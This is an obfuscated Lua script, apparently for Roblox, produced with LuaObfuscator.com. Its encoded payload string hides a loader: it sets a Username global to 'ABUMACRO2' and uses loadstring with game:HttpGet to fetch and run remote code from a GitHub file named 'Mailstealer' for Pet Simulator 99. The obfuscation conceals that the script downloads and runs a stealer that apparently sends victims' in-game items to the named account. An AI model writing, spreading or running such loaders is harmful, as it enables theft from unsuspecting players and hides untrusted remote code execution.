--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v66=v2(v0(v30,16));if v19 then local v76=v5(v66,v19);v19=nil;return v76;else return v66;end end end);local function v20(v31,v32,v33)if v33 then local v67=(v31/((5 -3)^(v32-(1 + 0))))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + 1)) ;return v67-(v67%(620 -(555 + 64))) ;else local v68=(933 -((1734 -(282 + 595)) + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v68 + v68))>=v68) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1639 -(1523 + 114)) );v18=v18 + 2 ;return (v36 * (231 + 25)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (3 -0) );v18=v18 + (1069 -(68 + 997)) ;return (v40 * (16778486 -(226 + 1044))) + (v39 * ((285487 -(32 + 85)) -219834)) + (v38 * 256) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=1 + 0 + 0 ;local v44=(v20(v42,1 + 0 ,977 -(892 + 65) ) * (((4 -0) -2)^(58 -26))) + v41 ;local v45=v20(v42,38 -17 ,31);local v46=((v20(v42,382 -(87 + 263) )==(181 -(67 + 113))) and  -(1 + 0)) or 1 ;if (v45==0) then if (v44==(0 -0)) then return v46 * (0 + 0) ;else v45=1;v43=0 -(1187 -(1069 + 118)) ;end elseif (v45==(2999 -(802 + 150))) then return ((v44==(0 -0)) and (v46 * ((1 -0)/0))) or (v46 * NaN) ;end return v8(v46,v45-(745 + (630 -352)) ) * (v43 + (v44/((999 -(915 + (178 -96)))^(147 -95)))) ;end local function v25(v47)local v48=(438 -(145 + 293)) + 0 ;local v49;local v50;while true do if (v48==(0 -0)) then v49=nil;if  not v47 then v47=v23();if (v47==(0 + (430 -(44 + 386)))) then return "";end end v48=792 -(368 + 423) ;end if (v48==(9 -6)) then return v6(v50);end if (v48==(20 -(10 + 8))) then v50={};for v77=3 -2 , #v49 do v50[v77]=v2(v1(v3(v49,v77,v77)));end v48=(1931 -(998 + 488)) -(416 + 26) ;end if (v48==((1 + 2) -2)) then v49=v3(v16,v18,(v18 + v47) -(1 + 0) );v18=v18 + v47 ;v48=3 -1 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 + 0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51~=(0 + 0)) then else local v69=529 -(406 + 123) ;while true do if (0==v69) then v52=1769 -(1749 + 20) ;v53=nil;v69=1;end if (v69==(1 + 0)) then v51=1323 -(1249 + 73) ;break;end end end if (v51==2) then local v70=0 + 0 ;local v71;while true do if (v70==(1145 -(466 + 679))) then v71=0;while true do if (v71==0) then v56=nil;v57=nil;v71=2 -1 ;end if (v71~=(2 -1)) then else v51=1903 -(106 + 1794) ;break;end end break;end end end if (v51~=1) then else local v72=0;while true do if (v72==1) then v51=2;break;end if (v72==0) then v54=nil;v55=nil;v72=1;end end end if (v51==3) then v58=nil;while true do local v79=0;local v80;while true do if (v79==0) then v80=0 + 0 ;while true do if (v80==0) then local v103=0;while true do if (v103==1) then v80=1;break;end if (v103~=0) then else if (v52==1) then local v107=0 + 0 ;local v108;local v109;while true do if (v107~=0) then else v108=0 -0 ;v109=nil;v107=2 -1 ;end if ((115 -(4 + 110))==v107) then while true do if (v108~=0) then else v109=584 -(57 + 527) ;while true do if (v109==0) then local v166=0;local v167;while true do if (v166==(1427 -(41 + 1386))) then v167=103 -(17 + 86) ;while true do if ((0 + 0)==v167) then local v175=0;while true do if (v175==(1 -0)) then v167=2 -1 ;break;end if (0==v175) then v57=v23();v58={};v175=167 -(122 + 44) ;end end end if (v167~=(1 -0)) then else v109=1;break;end end break;end end end if (v109==(3 -2)) then for v169=1 + 0 ,v57 do local v170=0;local v171;local v172;local v173;while true do if (v170==0) then v171=0;v172=nil;v170=1;end if (v170~=(1 + 0)) then else v173=nil;while true do if (v171~=(1 -0)) then else if (v172==1) then v173=v21()~=0 ;elseif (v172==2) then v173=v24();elseif (v172~=(68 -(30 + 35))) then else v173=v25();end v58[v169]=v173;break;end if (v171==0) then local v178=0 + 0 ;while true do if (v178~=0) then else v172=v21();v173=nil;v178=1;end if (v178~=1) then else v171=1258 -(1043 + 214) ;break;end end end end break;end end end v56[3]=v21();v109=2;end if (v109~=(7 -5)) then else v52=1214 -(323 + 889) ;break;end end break;end end break;end end end if (v52==2) then local v110=0 -0 ;local v111;local v112;while true do if ((580 -(361 + 219))~=v110) then else v111=320 -(53 + 267) ;v112=nil;v110=1 + 0 ;end if (v110==1) then while true do if ((413 -(15 + 398))~=v111) then else v112=982 -(18 + 964) ;while true do local v164=0;local v165;while true do if (v164==0) then v165=0 -0 ;while true do if (v165~=(0 + 0)) then else if (v112~=0) then else local v176=0;while true do if (v176~=0) then else for v179=1 + 0 ,v23() do local v180=850 -(20 + 830) ;local v181;local v182;local v183;while true do if (v180~=(1 + 0)) then else v183=nil;while true do if (v181==0) then local v186=0;while true do if (v186==0) then v182=0;v183=nil;v186=1;end if (v186==1) then v181=1;break;end end end if (v181==(127 -(116 + 10))) then while true do if (v182~=0) then else v183=v21();if (v20(v183,1,1 + 0 )~=(738 -(542 + 196))) then else local v187=0 -0 ;local v188;local v189;local v190;local v191;local v192;while true do if (v187==2) then v192=nil;while true do if (v188~=(1 + 1)) then else while true do if (v189~=2) then else local v194=0 + 0 ;local v195;local v196;while true do if (v194~=(1 + 0)) then else while true do if (v195~=(0 -0)) then else v196=0 -0 ;while true do if (v196==(1551 -(1126 + 425))) then local v206=0;while true do if (v206==(406 -(118 + 287))) then v196=3 -2 ;break;end if (v206==0) then if (v20(v191,1122 -(118 + 1003) ,1)==(2 -1)) then v192[379 -(142 + 235) ]=v58[v192[9 -7 ]];end if (v20(v191,1 + 1 ,979 -(553 + 424) )~=(1 -0)) then else v192[3]=v58[v192[3 + 0 ]];end v206=1 + 0 ;end end end if (v196==1) then v189=3;break;end end break;end end break;end if (v194==(0 + 0)) then v195=0;v196=nil;v194=1;end end end if (v189==0) then local v197=0;local v198;local v199;while true do if ((1 + 0)==v197) then while true do if (v198==0) then v199=0;while true do if (v199==(0 + 0)) then local v207=0 -0 ;while true do if (0==v207) then v190=v20(v183,2,7 -4 );v191=v20(v183,8 -4 ,6);v207=1;end if (1==v207) then v199=1 + 0 ;break;end end end if (v199~=(4 -3)) then else v189=1;break;end end break;end end break;end if (v197==0) then v198=753 -(239 + 514) ;v199=nil;v197=1;end end end if (v189~=(2 + 1)) then else if (v20(v191,1332 -(797 + 532) ,3 + 0 )==1) then v192[2 + 2 ]=v58[v192[4]];end v53[v179]=v192;break;end if (v189~=(2 -1)) then else local v201=0;while true do if (v201~=1) then else v189=1204 -(373 + 829) ;break;end if (v201==(731 -(476 + 255))) then local v204=0;local v205;while true do if (0~=v204) then else v205=0;while true do if (v205~=0) then else v192={v22(),v22(),nil,nil};if (v190==0) then local v208=0 -0 ;local v209;local v210;local v211;while true do if (v208~=0) then else v209=0 -0 ;v210=nil;v208=1;end if (v208==(239 -(64 + 174))) then v211=nil;while true do if (v209~=(1 + 0)) then else while true do if (v210~=(0 -0)) then else v211=0;while true do if (v211~=(336 -(144 + 192))) then else v192[219 -(42 + 174) ]=v22();v192[4]=v22();break;end end break;end end break;end if (0~=v209) then else local v218=0 + 0 ;while true do if (0==v218) then v210=0 + 0 ;v211=nil;v218=1;end if (v218~=(1 + 0)) then else v209=1;break;end end end end break;end end elseif (v190==(1505 -(363 + 1141))) then v192[3]=v23();elseif (v190==2) then v192[3]=v23() -((1582 -(1183 + 397))^16) ;elseif (v190~=(8 -5)) then else local v219=0 + 0 ;local v220;local v221;while true do if (v219~=1) then else while true do if (v220==0) then v221=0 + 0 ;while true do if ((1975 -(1913 + 62))==v221) then v192[2 + 1 ]=v23() -((5 -3)^16) ;v192[4]=v22();break;end end break;end end break;end if (v219~=(1933 -(565 + 1368))) then else v220=0;v221=nil;v219=3 -2 ;end end end v205=1662 -(1477 + 184) ;end if (v205~=(1 -0)) then else v201=1 + 0 ;break;end end break;end end end end end end break;end if (v188==0) then v189=856 -(564 + 292) ;v190=nil;v188=1 -0 ;end if ((2 -1)==v188) then local v193=304 -(244 + 60) ;while true do if (v193==(0 + 0)) then v191=nil;v192=nil;v193=1;end if (v193~=1) then else v188=2;break;end end end end break;end if (0==v187) then v188=0;v189=nil;v187=1;end if (v187~=(477 -(41 + 435))) then else v190=nil;v191=nil;v187=2;end end end break;end end break;end end break;end if (v180==(1001 -(938 + 63))) then v181=0 + 0 ;v182=nil;v180=1126 -(936 + 189) ;end end end for v184=1,v23() do v54[v184-(1 + 0) ]=v28();end v176=1;end if (v176~=(1614 -(1565 + 48))) then else v112=1 + 0 ;break;end end end if (v112~=(1139 -(782 + 356))) then else return v56;end break;end end break;end end end break;end end break;end end end v103=1;end end end if (1~=v80) then else if (v52==0) then local v104=0;local v105;local v106;while true do if (1~=v104) then else while true do if ((267 -(176 + 91))~=v105) then else v106=0 -0 ;while true do if (v106~=(2 -0)) then else v52=1093 -(975 + 117) ;break;end if (v106~=(1876 -(157 + 1718))) then else local v161=0 + 0 ;while true do if (v161~=(3 -2)) then else v106=2;break;end if ((0 -0)==v161) then v55={};v56={v53,v54,nil,v55};v161=1 + 0 ;end end end if (v106==0) then local v162=0;local v163;while true do if (0~=v162) then else v163=0 -0 ;while true do if (v163~=1) then else v106=1;break;end if (v163~=0) then else local v174=0 -0 ;while true do if (0==v174) then v53={};v54={};v174=1228 -(322 + 905) ;end if (v174==1) then v163=1;break;end end end end break;end end end end break;end end break;end if (v104~=0) then else v105=611 -(602 + 9) ;v106=nil;v104=1;end end end break;end end break;end end end break;end end end local function v29(v59,v60,v61)local v62=0;local v63;local v64;local v65;while true do if (v62==1) then v65=v59[3];return function(...)local v81=v63;local v82=v64;local v83=v65;local v84=v27;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v95=0,v89 do if (v95>=v83) then v87[v95-v83 ]=v88[v95 + 1 ];else v91[v95]=v88[v95 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do local v96=0;while true do if (v96==1) then if (v94<=9) then if (v94<=4) then if (v94<=1) then if (v94>0) then local v113=v93[2];local v114,v115=v84(v91[v113](v13(v91,v113 + 1 ,v93[3])));v86=(v115 + v113) -1 ;local v116=0;for v134=v113,v86 do local v135=0;while true do if (v135==0) then v116=v116 + 1 ;v91[v134]=v114[v116];break;end end end else local v117=v93[2];v91[v117]=v91[v117](v13(v91,v117 + 1 ,v86));end elseif (v94<=2) then do return;end elseif (v94>3) then local v138=v93[2];local v139=v91[v93[3]];v91[v138 + 1 ]=v139;v91[v138]=v139[v93[4]];else local v143=v93[2];v91[v143]=v91[v143](v13(v91,v143 + 1 ,v86));end elseif (v94<=6) then if (v94==5) then local v119=v93[2];local v120=v91[v93[3]];v91[v119 + 1 ]=v120;v91[v119]=v120[v93[4]];else v91[v93[2]]();end elseif (v94<=7) then if ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v61;else v91[v93[2]]=v61[v93[3]];end elseif (v94>8) then if (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end else v85=v93[3];end elseif (v94<=14) then if (v94<=11) then if (v94>10) then v91[v93[2]]=v93[3];else v61[v93[3]]=v91[v93[2]];end elseif (v94<=12) then v91[v93[2]]();elseif (v94>13) then do return;end else v85=v93[3];end elseif (v94<=16) then if (v94==15) then v61[v93[3]]=v91[v93[2]];elseif ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v61;else v91[v93[2]]=v61[v93[3]];end elseif (v94<=17) then local v130=v93[2];local v131,v132=v84(v91[v130](v13(v91,v130 + 1 ,v93[3])));v86=(v132 + v130) -1 ;local v133=0;for v136=v130,v86 do local v137=0;while true do if (v137==0) then v133=v133 + 1 ;v91[v136]=v131[v133];break;end end end elseif (v94>18) then if (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end else v91[v93[2]]=v93[3];end v85=v85 + 1 ;break;end if (0==v96) then v93=v81[v85];v94=v93[1];v96=1;end end end end;end if (v62==0) then v63=v59[1];v64=v59[2];v62=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D6503093O004142554D4143524F32030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4142554D4143524F322F50657453696D756C61746F722O392F6D61696E2F4D61696C737465616C6572000F3O002O123O00013O0026133O00010001000100040D3O00010001002O12000100033O00120F000100023O001210000100043O001210000200053O002004000200020006002O12000400074O0011000200046O00013O00022O000600010001000100040D3O000E000100040D3O000100012O000E3O00017O00",v9(),...);
